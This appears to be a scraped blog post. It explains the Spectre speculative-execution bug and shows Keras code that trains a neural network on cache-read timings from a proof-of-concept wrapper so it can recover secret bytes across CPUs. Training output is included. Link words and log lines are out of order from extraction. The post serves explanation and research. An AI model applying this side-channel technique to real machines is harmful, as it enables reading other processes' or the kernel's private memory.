dropped a on the security community last week detailing CPU bugs affecting , , and architectures going back as far as Pentium Pros. Yup, the chip with a mountain of cache and immortalized by Weird Al. Google’s Project Zero bombshell Intel AMD ARM There are actually a few variants of the bugs, collectively named and , detailed in the . Interestingly, the last line of the bug summary states: Meltdown Spectre official bug report All PoCs are written against specific processors and will likely require at least some adjustments before they can run in other environments, e.g. because of hardcoded timing tresholds[sic]. Indeed, hardcoding values is never a good idea as it often leads to inflexible code. This post explores how we might learn these thresholds with the help of deep learning. But first, let’s review how Spectre works. Spectre — or how to take advantage of CPU optimizations If you’re looking for the full explanation of this clever exploit, you can find the paper . In summary, Spectre takes advantage of two very popular CPU optimizations: and . When a CPU executes a bit of code that includes a branch attached to a memory value, since retrieving this value from RAM may take some time, the CPU may elect to execute past the branch. In higher level programming languages, branches are usually the result of conditional statements such as . When the value in RAM finally arrives, the CPU throws away the executed code if it happened to be wrong in its prediction. here branch prediction speculative execution if … then … This speculative execution has the side effect of copying RAM the CPU reads into cache and if this memory belongs to another process or, worse, the kernel, it will be cached before modern security systems realize the memory access is forbidden. Thus, malicious code can trick the CPU into caching privileged memory and then read out the cached value via a . This sort of attack exploits timing differences in how long a CPU takes to fetch values from RAM (slow) vs on-die CPU cache (fast). As the bug summary mentions, every CPU will exhibit different timing behavior. This is where deep learning comes in. side channel timing attack Deep Learning CPU Cache Timings To read the byte value of a privileged memory address, our attempts to read every possible 8 bit value at a given memory address — all 256 of them. We can’t directly read the value because the kernel won’t let us, but we can observe how long each read took. If a read is quick, chances are we hit the right value. Unfortunately, this isn’t always true as some values are always a bit faster to read (for example, 0 and 1) so assuming the fastest can lead to misread values. Let’s see how we can use a deep learning model to improve read accuracy. proof of concept code The full proof of concept code can be found and I’ll include only the most relevant bits from here on. To get started, we’ll build our training data using a string of possible byte values and their observed cache timings: here data_x = np.zeros([n_samples, 256])data_y = np.zeros([n_samples, len(unique_chars)])for i in range(n_iterations):for j, val in enumerate(secret_chars):data_x[i * n_chars + j, :] = deep_spectre.train(j)data_y[i * n_chars + j, char_to_idx_map[val]] = 1 contains our training data and contains our target data. Each row of represents an observation of all 256 cache read timings for a single byte value. Each row of contains the byte value, . Neural networks are typically sensitive to large values so we’ll normalize (0 mean, unit variance) the timings using handy scaler. We’ll also split the training and target data into training and validation sets. The validation set contains data the model never sees while training and provides a reasonable metric of how well the model will perform in the wild: data_x data_y data_x data_y one hot encoded Scikit Learn’s scaler = StandardScaler()data_x = scaler.fit_transform(data_x)x_train, x_test, y_train, y_test = train_test_split(data_x, data_y) Now for the exciting part — let’s build a simple deep model. We’ll use the to wrap and build a four layer densely connected neural network. If you’re curious about neural architecture, I’d encourage you to check out the Keras has to offer. Keras API TensorFlow other layer types model = Sequential()model.add(Dense(200, input_shape = (256,), activation = ‘relu’))model.add(Dense(150, activation = ‘relu’))model.add(Dense(100, activation = ‘relu’))model.add(Dense(len(unique_chars), activation = ‘softmax’)) model.compile(loss = ‘categorical_crossentropy’,optimizer = ‘adam’,metrics = [‘accuracy’]) model.fit(x_train, y_train,batch_size = 32,epochs = 10,validation_data = (x_test, y_test)) The call to will start the training process. If all goes well, our model should achieve above 90% accuracy. Running this on my machine yields: model.fit() Train on 48000 samples, validate on 16000 samplesEpoch 1/1048000/48000 [ ] — 4s 73us/step — loss: 0.4543 — acc: 0.9007 — val_loss: 0.3505 — val_acc: 0.9204Epoch 3/1048000/48000 [ ] — 3s 73us/step — loss: 0.2516 — acc: 0.9441 — val_loss: 0.2948 — val_acc: 0.9293Epoch 5/1048000/48000 [ ] — 4s 73us/step — loss: 0.2320 — acc: 0.9460 — val_loss: 0.2765 — val_acc: 0.9360Epoch 7/1048000/48000 [ ] — 4s 74us/step — loss: 0.2324 — acc: 0.9468 — val_loss: 0.2502 — val_acc: 0.9403Epoch 9/1048000/48000 [ ] — 3s 72us/step — loss: 0.2277 — acc: 0.9467 — val_loss: 0.2663 — val_acc: 0.9392 ] — 4s 83us/step — loss: 2.9168 — acc: 0.3363 — val_loss: 0.7985 — val_acc: 0.8276Epoch 2/1048000/48000 [ ] — 4s 75us/step — loss: 0.2802 — acc: 0.9367 — val_loss: 0.2825 — val_acc: 0.9335Epoch 4/1048000/48000 [ ] — 4s 73us/step — loss: 0.2368 — acc: 0.9451 — val_loss: 0.2640 — val_acc: 0.9361Epoch 6/1048000/48000 [ ] — 3s 73us/step — loss: 0.2405 — acc: 0.9458 — val_loss: 0.2588 — val_acc: 0.9376Epoch 8/1048000/48000 [ ] — 4s 73us/step — loss: 0.2269 — acc: 0.9474 — val_loss: 0.2452 — val_acc: 0.9408Epoch 10/1048000/48000 [ Now that we have a trained model, we can use it to predict unknown byte values given only cache timings. For example, let’s read a 40 byte secret string: secret_len = 40x_message = np.zeros([secret_len, 256])for i in range(secret_len):x_message[i, :] = deep_spectre.read(i) After passing to , we simply take the output neuron with the highest probability via and map it back to a byte value: x_message model.predict() np.argmax() y_pred = model.predict(scaler.transform(x_message))pred_chars = np.argmax(y_pred, axis=1)message = ‘’.join(list(map(lambda x: chr(idx_to_char_map[x]), pred_chars)))print(“The secret message is:”, message) If everything went according to plan, we should see: The secret message is: The Magic Words are Squeamish Ossifrage. Packaging these deep learning frameworks with an exploit would make for a prohibitively large payload. However, it may be possible to employ to reduce the size of the model. It’s certainly not difficult to imagine a new breed of neural exploits armed with deep learning models to overcome idiosyncrasies found across CPU architectures and software versions. TensorFlow Lite Of course, this remains purely speculative ;)